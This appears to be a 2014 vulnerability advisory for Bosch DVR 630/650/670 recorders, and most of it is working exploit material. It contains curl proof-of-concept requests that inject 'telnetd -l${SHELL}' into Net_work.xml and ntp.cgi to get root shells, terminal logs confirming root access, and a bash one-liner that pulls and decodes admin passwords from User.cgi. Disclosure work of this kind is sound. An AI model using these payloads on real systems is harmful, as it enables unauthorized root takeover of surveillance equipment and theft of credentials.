:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ posdub[at]gmail.com ] [ 2014-10-01 ] ############################################################################### # [ Bosch Security Systems DVR 630/650/670 Series ] Multiple Vulnerabilities # ############################################################################### # # Device: "The Bosch Video Recorder 630/650 Series is an 8/16 # channel digital recorder that uses the latest H.264 # compression technology. With the supplied PC # software and built-in web server, the 630/650 Series is # a fully integrated, stand-alone video management # solution that's ready to go, straight out of the box. # Available with a variety of storage capacities, the # 630/650 Series features a highly reliable embedded # design that minimizes maintenance and reduces # operational costs. The recorder is also available with a # built-in DVD writer." # # Vendor: http://www.boschsecurity.com/ # Product: DVR 630/650 http://resource.boschsecurity.us/documents/Data_sheet_enUS_1977239307.pdf # DVR 670 http://resource.boschsecurity.us/documents/DVR_670_Series_Data_sheet_enUS_7654294923.pdf # # Software Download: # http://resource.boschsecurity.us/software/Software_DVR630_650_firmware_v212_all_1980902667.zip # http://resource.boschsecurity.us/software/Software_DVR670_firmware_v212_enUS_8599929867.zip # # Timeline: 2014-10-01 Vulnerability discovered # 2014-10-03 1 Contact with vendor - No response # 2014-10-14 Published # # ################################################################### # Gaining Root Shell Access [1]: POST /Net_work.xml HTTP/1.1 Accept: */* Accept-Language: pl Referer: http://10.11.219.2/network.html Content-Type: text/xml; charset=UTF-8 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Host: 10.11.219.2 Content-Length: 1274 DNT: 1 Proxy-Connection: Keep-Alive Pragma: no-cache Cookie: MosaLanguage=0; session= 0 10.11.219.2 255.255.255.0 10.11.219.1 0.0.0.0 0.0.0.0 10.11.219.2 255.255.255.0 10.11.219.1 0.0.0.0 0.0.0.0 80 0 1 wxss ffl |telnetd -l${SHELL} -p30 # sdads dsadsd sdasdas dasdas 0 0 0 0 0 0 0 0 0 0 25 0 0 ## PoC: root@debian:~# curl -i -s -k -X 'POST' -H 'Referer: http://10.11.219.2/network.html' -H 'Content-Type: text/xml; charset=UTF-8' \ -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \ -b 'MosaLanguage=0; session=' --data-binary $'\x0d\x0a 0\x0d\x0a 10.11.219.2\x0d\x0a \ 255.255.255.0\x0d\x0a 10.11.219.1\x0d\x0a 0.0.0.0\x0d\x0a \ 0.0.0.0\x0d\x0a 10.11.219.2\x0d\x0a 255.255.255.0\x0d\x0a 10.11.219.1\x0d\x0a \ 0.0.0.0\x0d\x0a 0.0.0.0\x0d\x0a 80\x0d\x0a 0\x0d\x0a \ 1\x0d\x0a wxss\x0d\x0a ffl\x0d\x0a \ |telnetd -l${SHELL} -p30 #\x0d\x0a \x0d\x0a \x0d\x0a \ \x0d\x0a sdads\x0d\x0a dsadsd\x0d\x0a \ sdasdas\x0d\x0a dasdas\x0d\x0a 0\x0d\x0a \ 0\x0d\x0a 0\x0d\x0a 0\x0d\x0a 0\x0d\x0a \ 0\x0d\x0a 0\x0d\x0a 0\x0d\x0a 0\x0d\x0a \ 0\x0d\x0a \x0d\x0a 25\x0d\x0a 0\x0d\x0a \x0d\x0a \ \x0d\x0a \x0d\x0a \x0d\x0a \x0d\x0a \x0d\x0a \ \x0d\x0a 0\x0d\x0a\x0d\x0a' 'http://10.11.219.2/Net_work.xml' root@debian:~# telnet 10.11.219.2 30 Trying 10.11.219.2... Connected to 10.11.219.2. Escape character is '^]'. BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. / # id uid=0(root) gid=0(root) / # uname -a Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown / # ps |grep telnet 2827 root 228 S telnetd -l/bin/sh -p30 / # netstat -ltn | grep 30 tcp 0 0 0.0.0.0:30 0.0.0.0:* LISTEN / # echo pwnd & exit pwnd Connection closed by foreign host. root@debian:~# ################################################################### # Gaining Root Shell Access (authorization is needed) [2]: GET /ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id&rnd=4392 HTTP/1.1 Accept: */* Accept-Language: pl Referer: http://10.11.219.2/system.html Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Host: 10.11.219.2 DNT: 1 Proxy-Connection: Keep-Alive Cookie: MosaLanguage=0; session= ## PoC: root@debian:~# curl -i -s -k -X 'GET' \ -H 'Referer: http://10.11.219.2/system.html' \ -H 'User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)' -H 'DNT: 1' \ -b 'MosaLanguage=0; session=' 'http://10.11.219.2/ntp.cgi?cmd=ntp_start&time_server=1&private_server=192.168.0.245|%20telnetd%20-l${SHELL}%20-p40;%20id' root@debian:~# telnet 10.11.219.2 40 Trying 10.11.219.2... Connected to 10.11.219.2. Escape character is '^]'. BusyBox v1.1.2 (2009.12.29-03:59+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. / # id uid=0(root) gid=0(root) / # uname -a Linux everfocus 2.6.24-rt1-hi3520v100 #9 Thu Sep 2 14:00:47 CST 2010 armv6l unknown / # ps |grep telnet 2827 root 228 S telnetd -l/bin/sh -p40 / # netstat -ltn | grep 40 tcp 0 0 0.0.0.0:40 0.0.0.0:* LISTEN / # echo pwnd & exit pwnd Connection closed by foreign host. root@debian:~# ################################################################### # Admin Password Disclosure: http://10.11.219.2/User.cgi?cmd=get_user ## PoC Exploit: #!/bin/bash x=0; for i in $(curl --silent http://10.11.219.2/User.cgi?cmd=get_user| sed 's/<[^>]\+>/ /g' | sed -r 's/(\s)+[0-9]//g'); do base64 -d<<<$i; if [ $(( $x % 2 )) -eq 0 ]; then echo -n ":"; else echo ; fi; ((x++)); done ################################################################### # Sensitive Information Disclosure: http://10.11.219.2/Config.cgi?cmd=system_info http://10.11.219.2/System.xml http://10.11.219.2/Net_work.xml http://10.11.219.2/webcmd.html / # cat /4mosa600/data/Webcmd_help.txt cmd value (sample) ====================+========================== blockid | 0 ~ block max // show block info and flag and gop status. --------------------+------------------------- disk | // show disk temp. --------------------+------------------------- reboot | // restart DVR. --------------------+------------------------- remote-info | // socket status. --------------------+------------------------- log | 1: System // show system log. | 2: Record | 4: Login | 8: Configure | 16: Operation | 31: All | 63: Service --------------------+------------------------- ionly | 1~12 how many frames in a GOP will send to internet | 0: all I/P-frame (default) | 1: I only | 2: IP | 3: IPP | 4: IPPP | .... | 12: IPPPPPPPPPPP | others: show current value on DVR. --------------------+------------------------- chlink | 0~MKF_CHANNEL // show channel link. --------------------+------------------------- bitrate | // show bitrate information. --------------------+------------------------- dls | // show about time and DLS message. --------------------+------------------------- bmp | // dump bmp file to http://x.x.x.x/vga0.bmp --------------------+------------------------- msg | This is bitmap | bit 0 show encode FPS and Bitrate. | bit 1 show encode resolution.(dependent bit 1) | bit 2 show remote client mesage. | bit 3 show ptz command. | bit 4 cpu and memory usage.. --------------------+------------------------- remote-cgi | 0 disable all cgi command. | 1 show all cgi command to console. | 2 show cig command if not "login_id" --------------------+-------------------------